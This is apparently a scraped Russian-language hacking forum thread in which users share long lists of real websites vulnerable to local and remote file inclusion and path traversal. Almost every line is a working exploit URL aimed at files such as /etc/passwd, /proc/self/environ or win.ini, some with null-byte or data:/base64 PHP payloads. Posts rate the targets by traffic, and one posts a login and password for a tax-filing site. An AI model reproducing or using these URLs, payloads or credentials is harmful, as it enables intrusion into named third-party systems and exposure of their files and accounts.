http://www.eskandynawia.pl/index.php?target=../../../../../../../../../../../../../../etc/hosts/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././



http://www.flightbadmintonclub.com/info.php?target=../../../../../../../../../../../../../../etc/hosts/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././

http://int-sch.ru/cgi-bin/zs.cgi?p=/../../../../../../../etc/passwd



http://www.cibem7.semur.edu.uy/home.php?pagina=../../../../../proc/self/environ



http://museum.nhm.uga.edu/index.php?page=../../../../../../../../../../../../../../../../etc/passwd%00

http://hs.seosan.com/indexshop.phtm?call=../../../../../../../../../../etc/hosts/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././



http://sonan.co.kr/_mobi2.php?call=../../../../../../../../../../etc/hosts/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././

http://www.proaxca.com/inc.php?inc=../../../../../../../etc/passwd%00

http://www.montesdelplata.com.uy/fotos.php?lang=../../../../../../../../../../etc/passwd%00.jpg&pagina=2

http://www.fieldit.co.uk/index.php?page=../../../../../../../../../etc/passwd%00



http://www.kruta.ee/main.php?lang=rus&pg=3&sp=../../../../../../etc/hosts/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././

http://www.fotooleg.ru/page.php?id=.../../../../../../../../../../etc/passwd%00

http://www.tracegps.com/index.php?func=carte&langue=../../../../../../../../proc/self/status%00



http://www.boqueria.info/index.php?lang=../../../../../../../../proc/self/status/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././

Сеть электронных торговых площадок [ЭЦП]

http://www.ieservice.ru/ViewForms/File.ashx?id=../../../../../../../../../../windows/win.ini

http://www.ieservice.ru/ViewForms/File.ashx?id=../Reductions.aspx

P.S Всего объявлено 5940 аукционов на общую сумму 12 381 685 985 руб.

http://zvezdaspb.ru/index.php?page=2&razd=.htaccess

http://diuf.unifr.ch/pai/education/2006_2007/ca/index.php?page=/etc/passwd&subpage=/etc/passwd

Инклюд есть, но не могу обрезать окончание.


http://l2blackbird.com/index.php?id=../forums/index




http://l2sexi.es/?pagina=../index




http://en.l2vintage.cl/index.php?page=../pages/project

RFI


http://academy.tomsk.ru/?page=data:,%3C%3fphp%20phpinfo();%20?%3E

http://www.pionerplus.ru/edu/index.php?id=avtoriz/../../../../../../../../../proc/self/cmdline%00%27

http://fx-autotrade.ru/auction_details.php?id=../../../../../../../proc/self/status%00%27

LFI


http://www.3ok.pl/aktualnosci.php?plik=../../../../../../../../../etc/passwd
http://www.bcpo.net/go.php?display_id=25&content=C:\windows\system32\drivers\etc\hosts
http://www.daybyday.org/devotional.php?/etc/passwd
http://www.c114.com/c114/index3.htm?body=../../../../../../../../../etc/passwd
http://fermer.by/library.php?id=2&art=../../../../../etc/passwd%00
http://www.cybertecturemirror.com/main.php?id=/../../../../../../../../../../../etc/passwd/./././././././././././././././[....]/././././././././.
http://www.energiepark-druiberg.de/index.php?id=/../../../../../../../../../../../../etc/passwd/./././././././././././././././[....]/././././././././.
http://astarta-tur.dn.ua/index.php?p=2&pg=3/../../../../../../../../../../../etc/hosts/./././././././././././././././[....]/./././././././././././.
http://topframe.ru/services.php?page=../../../../../../../../etc/passwd%00
http://www.marcellealix.com/index.php?page=/../../../../../../../../../../etc/passwd/./././././././././././././././[....]/./././././././././././.
http://a2zexpress.com.my/index.php?page=C:\windows\system32\drivers\etc\hos ts
http://www.cvo-crescendo.be/page.php?FILE=../../../../../../../../../../etc/hosts/./././././././././././././././[....]/././././././././././
http://www.mijstegels.nl/index.php?file=../../../../../../etc/passwd
http://neodemos.it/index.php?file=/../../../../../../../../../../etc/hosts/./././././././././././././././[....]/././././././././././
http://phoenixhumanservices.org/index.php?page=/../../../../../../../../../../etc/passwd
http://www.cave-joly.ch/index.php?page=../etc/passwd%00
http://rplfrance.org/index.php?content=/etc/passwd
http://www.clarksdalenow.org/view.php?arc=&viewfile=/etc/passwd
http://www.w-castle.net/sub-main.php?leftfile=inc/left_food05.html&contentfile=/etc/hosts
http://arch.slidingonthecheap.com//co/archive/oldtop.php?link=/etc/passwd
http://www.lightwarrior.ru/csl.php?name=../../../../../../../../../../../../etc/passwd
http://www.zvuk.uu.ru/catalog/article.php?file=../../../../../../../../../../etc/passwd
http://www.xenosystem.com/t2.php?id=/etc/passwd
http://www.abei.it/index.php?file=/etc/passwd&sezione=Assemblea%202014&menu=Convocazione%20del%2025.06.2014
http://www.gaspforair.org/gasp/ordinance/ordinance_detail.php?fl=../../../../../../../../etc/passwd
http://www.shopiran.co.uk/index.php?page=/etc/passwd
http://www.ihcun.org/ihc/news/zh-cn/news.php?Title=/etc/passwd
http://extranet.ices.fr/PA_international.php?doc=/etc/passwd
http://www.cebesms.com/as.php?sayfa=C:\windows\system32\drivers\etc\hosts
http://www.anteny.katowice.pl/lupa1.php?tytul=TELEWIZJA%20NA%20KARTE&plik=../../../../../../../etc/passwd
http://www.diseni.com/cijara/0makina.php?censuphtm=/etc/hosts
http://ethiopianconsla.org/ConsularServicesAM/ConsularService.php?Page=C:\windows\system32\drive rs\etc\hosts
http://extranet.ices.fr/PA_international.php?doc=/etc/passwd
http://rmph.lbi.ro/2013/index.php?id=/../../../../../../../etc/passwd%00
http://gk-adept.ru/index.php?id=index&id1=index&id3=../../../../../../../../../etc/passwd%00
http://www.trigun.it/2/home3.php?id=C:\windows\system.ini
http://www.e-tentes.gr/products.php?p=297&c=15&se&pg=4&l=2/../../../../../../../../../../../etc/hosts/./././././././././././././././[....]/./././././././././././.
http://www.belaplast.by/stati.php?page=../../../../../../..//etc/passwd/./././././././././././././././[....]/./././././././././././.
http://www.deloros-kbr.ru/index.php?Page=../../../../../../../etc/passwd/./././././././././././././././[....]/./././././././././././.
http://kovalyk.com.ua/index.php?page=../../../../../../../../etc/passwd/./././././././././././././././[....]/./././././././././././.
http://onedayparty.ru/afisha.php?page=../../../../../../etc/passwd%00
http://floordomain.com/gallery.php?page=/proc/self/environ
http://chemmanurcredits.com/index.php?page=../../../../../../../../../../../etc/hosts//./././././././././././././././[....]././././././././././././
http://www.tentuinstelling.be/index.php?page=../../../../../../../../../../../../etc/passwd
http://www.nerjacenter.com/?2-BR-Apartment-for-sale-in-Almu%F1ecar&lang=swe/../../../../../../../../etc/hosts/./././././././././././././././[....]/./././././././././././.
http://www.spielbyweb.com/games.php?lang=/../../../../../../../../proc/self/status/./././././././././././././././[....]/./././././././././././.
http://www.kepri.com/tripsignup.php?lang=/.././.././.././.././.././.././.././.././.././../etc/passwd%00&category=&tripId=105
http://www.friedrich-von-schiller.com/main.php?nav=eiskeller&lang=deDas/../../../../../../../../proc/self/status/./././././././././././././././[....]/././././././././././.
http://www.theosvillage.gr/photogallery.php?lang=../../../../../../../../etc/passwd/./././././././././././././././[....]/././././././././././.
http://www.barcares-loueurs.com/who.php?lang=/../../../../../../../../etc/passwd/./././././././././././././././[....]/././././././././././.
http://www.askco.fr/index.php?lang=../../../../../../../etc/passwd%00
http://www.bermacorporate.com/?lang=it/../../../../../../../../etc/passwd/./././././././././././././././[....]/././././././././././.
http://roomy-tv.com/SelectChannels.php?ChannelCountry=Albania&HeadTitle=Albania&Lang=../../../../../../../../../../etc/passwd%00
http://www.bbg.org.bd/gallery_viewer.php?file=etc/passwd
http://www.cowtownguitars.com/itemtest2.php?invno=gsh51&itemtop=/etc/passwd
http://grekokatolicy-baniemazurskie.pl/index/main_pl.php?plik=/etc/passwd
http://www.borgoallegro.it/borgo/serate.php?link=../../../../../../../../../etc/hosts
http://www.lafamiglia.se/tidigare-kunder.php?inkludera=../../../../../../../../../etc/passwd
http://www.kashti.com/bul/index.php?k=tmp/../../../../../../../../../../../../../etc/passwd/./././././././././././././././[....]/./././././././././
http://virtuafighter.com/view.php?section=vf4&file=../../../../../../../../../etc/passwd
http://www.insights-me.com/index.php?id=100001&item=gcc&file=../../../../../../../../../etc/passwd
http://www.playtimesports.nf.net/AvalonEast/news_read.php?fname=../../../../../../../etc/passwd
http://www.chebapparat.ru/dox.php?file=../../../../../../../../../etc/hosts
http://vrmz.org/showruk.php?file=../../../../../../../../../../etc/hosts/./././././././././././././././[....]/././././././././././
http://wisataagroinkarla.com/fasilitas.php?file=/proc/self/status
http://www.genetaver.com/main.php?pg_ref=/etc/passwd
http://www.nd-chretiente.com/index-site.php?file=qw/../../../../../../../../../../etc/hosts/./././././././././././././././[....]/././././././././././
http://www.pitcherflaccomio.com/new/index.php?file=../../../../../../../../../../etc/hosts/./././././././././././././././[....]/././././././././././
http://www.steinbeckequine.com/NewWebsite/IndexServiceDisplay.php?file=./.././.././.././.././.././.././.././.././.././.././.././.././.././../etc/passwd
http://www.pravasiexpress.com/index.php?file=/etc/passwd
http://www.centrotradizioneorale.net/iframe.php?file=/etc/hosts
https://www.cgsun.co.kr:6001/niabbs2/inc.php?inc=sub1-2/../../../../../../../../../etc/group%00
http://www.biodm.ru/katalog/bio.php?n=2&p=5&z=3/../../../../../../../etc/passwd%00
http://www.ecocopy.ru/catalog/cat.php?n=4../../../../../../../../../../etc/hosts/./././././././././././././././[....]/././././././././././
http://ibiw.ru/index.php?p=news&lang=../../../../../../etc/passwd%00
http://registr47.ru/index.php?pages=news&lang=text_ru&id_nws=../../../../../../../etc/passwd%00
http://www.herion-systemtechnik.de/index.php?lang=q/../../../../../../../../../../etc/hosts/./././././././././././././././[....]/././././././././././
http://www.alltrack.ch/outdoor/index.php?id=/etc/passwd
http://www.businessnewsforkids.com/volume.php?id=/etc/passwd
http://www.filllpg.co.uk/index.php?page=/../../../../../../../../../etc/passwd
http://www.gccc.gov.bd/index.php?page=/../../../../../../../../../etc/passwd
http://www.provideoproductions.com/index.php?page=/../../../../../../../../../etc/passwd
http://www.qcivalves.com/index.php?page=/proc/self/environ
http://www.saskpension.com/index.php?page=C:\windows\system.ini
http://www.txregionalcouncil.org/display.php?page=/etc/passwd
http://dkspeedruns.com/DK64/dk64.php?page=C:\windows\system.ini
http://www.basegroup.su/index.php?Page=/../../../../../../../../../etc/passwd
http://www.mel-tour.com/english/index.php?page=/../../../../../../../../../etc/passwd
http://www.pontecultura.co.uk/en/index.php?page=/etc/hosts
http://www.gogaspe.com/index_en.php?page=php/../../../../../../../etc/hosts
http://www.prodarom.com/anglais/gip/index_gip.php?page=/etc/hosts
http://brelect.fr/index.php?page=/etc/hosts
http://www.takojt.com/index.php?tpl=/../../../../../../../../../../../../../../etc/hosts//./././././././././././././././[....]./././././././././././
http://progalva.net/index.php?tpl=/../../../.././../../../.././../../../.././../../../.././../../../..//etc/hosts//./././././././././././././././[....]./././././././././././
http://www.pionerplus.ru/edu/index.php?id=/../../../../../../../../../../etc/passwd%00
http://www.mtpfish.ru/product/product_e.php?p=/proc/self/status
http://www.eurotrading.sk/index.php?page=/etc/hosts
http://www.gloucestercitybowlsclub.co.uk/competitive_games/county_league/index.php?team=B&opponents=../../../../../../../../../../etc/hosts
http://www.lwrm.org.uk/readthebible_new.php?word_doc=/proc/self/status&todaysDate=
http://ieet.dyu.edu.tw/ieet_new/try2.php?page=/etc/passwd
http://tayyar-intishar.org/index.php?content=/etc/hosts
http://www.swi.tu1.ru/index.php?content=/etc/passwd
http://www.digisoft.go.it/nuovo_lavoro/testo.php?testo=/etc/hosts
http://test.medvenka-crb.ru/Info.php?Reg=../../../../../../../../../../../etc/passwd%00
http://www.p-pp.com.ua/index.php?page=../../../../../../../../../../../../etc/passwd//./././././././././././././././[....]./././.
http://ergo-hestia.eu/zdrowieizycie.php?page=../../../../../../../../etc/passwd
http://www.luxtrading.sk/en/ld/Default.php?page=/etc/passwd
http://brucetonmills.us/index.php?page=/proc/self/status
http://www.emoto-peace-project.com/en/dr-emotos-message/artikel/?seite=left-2.html&artikel=/../../../../../../../../../etc/passwd
http://giperesvet.hut4.ru/index.php?page=/etc/passwd
http://www.japm.org/index_main.php?main=/etc/passwd
http://www.profera-trasporti.it/sito/index.php?q=/etc/hosts
http://www.grandpalladium.com.br/index.php?acao=pg&url=/proc/self/status
http://www.titantour.se/page2.php?p=/etc/passwd
http://www.epsilon.com.pl/index.php?page=../../../../../../../../../../../../../etc/passwd/./././././././././././././././[....]/././././././././././
http://www.frey.com.pl/wilczak/index.php?wolfdog=../../../../../../../../../../../../../etc/passwd/./././././././././././././././[....]/././././././././././
http://www.psd-file.com/index.php?page=../../../../../../../../../../../../../etc/passwd/./././././././././././././././[....]/././././././././././
http://silivonchik.ru/show.php?lng=ru&file=../../../../../../../../../etc/passwd
http://monocap.pl/index.php?lang=../../../../../../../../../../../../../etc/passwd/./././././././././././././././[....]/././././././././././
http://www.johner.com/help.php/static.php?page=p/./.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././etc/hosts
http://www.druginfonet.com/testing/dfpcode/index.php?pageID=../../../../../../../../../../../windows/system32/drivers/etc/hosts
http://jpgraph.ru/index.php?sel=p/./.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././proc/self/status/./././././././././././././././[....]/././././././././././
http://techmeup.com.au/index.php?page=p/../../../../../../../../../proc/self/status%00

RFI


http://www.jonmichaelsmusic.com/live/lyrics/sdfkjsdfjksdfjkl.php?file=data:;base64,PD9waHAgcGh waW5mbygpOyA/Pg==

cgi-ки светятся:


http://www.pereplet.ru/cgi/news.cgi/.html

ищем подходящее, и светится уже всё:


http://www.pereplet.ru/cgi/soros/readdb.cgi?f=/etc/passwd%00

CY 2500 + traff

не инъекция, но все же

https://www.besttaxfiler.com/login.php

sdgsds4g32@mail.ru (mailto:sdgsds4g32@mail.ru):123123

https://www.besttaxfiler.com/client..../../../../../../../../../../../../etc/passwd (https://www.besttaxfiler.com/clients/additional-download.php?fn=../../../../../../../../../../../../../etc/passwd)

↑ (https://antichat.live/posts/3856399/)
не инъекция, но все же
https://www.besttaxfiler.com/login.php
sdgsds4g32@mail.ru (mailto:sdgsds4g32@mail.ru)
:123123
https://www.besttaxfiler.com/client..../../../../../../../../../../../../etc/passwd (https://www.besttaxfiler.com/clients/additional-download.php?fn=../../../../../../../../../../../../../etc/passwd)


Это AFD - Arbitrary File Downloading

http://ispconfig.hu/index.php?page=/proc/self/environ
http://www.eastwestopticians.com/?page=/proc/self/environ

http://www.inmolamaestra.com/Principal.php?pagina=/proc/self/environ

http://www.agrarnagazeta.com.ua/file.php?component=sys_media_doc&file=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

Тиц 8900

Pr 4

Траф ~ 20к


http://www.turizm.ru/visas/quickstore.cgi?page=../../../../../../etc/passwd%00
(http://www.turizm.ru/visas/quickstore.cgi?page=../../../../../../etc/passwd%00)

http://www.medisoftna.com/index.php?page=../etc/passwd

Ещё пучек


http://www.larute.se/index.php?page=../../../../../etc/passwd
http://www.fotoschule.ch/index.php?page=../../../../../etc/passwd
http://www.clarkwork.com/Nathan/index.php?page=../../../../../../etc/passwd
http://msap.centre-de-ressources.fr/partenaires/index.php?page=../../../../../etc/passwd
http://www.cieply-dotyk.pl/index.php?page=../../../../etc/passwd
http://www.torsdagsbowling.dk/index.php?page=../../../etc/passwd
http://www.treats-gelato.co.uk/index.php?page=../../../../etc/passwd
http://www.thermodirekt.com/cgi-bin/wrapper.php?req=index.php&nav=prod.php&page=../../../../etc/passwd
http://www.mrshadow.se/index.php?page=../../../../etc/passwd
http://www.royeres87.fr/index.php?page=../../../../../etc/passwd
http://www.cynthiabend.dgi.bz/index.php?contents=menu2&page=../../../../../../etc/passwd
http://www.theshedshop.com/shedshop2/index.php?page=../../../../../../etc/passwd
http://cwc.mwa.co.th/eng/index.php?page=../../../../../etc/passwd
http://www.fjallochfiske.se/index.php?page=../../../../../etc/passwd

http://seldon.sourceforge.net/doc-5.0/file.php?name=../../../../../../etc/passwd

Если кто-нибудь сможет проинклудить, напиши в ЛС каким образом ты это сделал.

3nvY, это не инклуд


http://seldon.sourceforge.net/doc-5.0/file.php?name=../../doc-5.0/file.php



$content = file_get_contents("code/" . $_GET["name"]);

↑ (https://antichat.live/posts/4022233/)
3nvY, это не инклуд


Прикрыли там лавочку... Но всё же, спасибо за пояснение.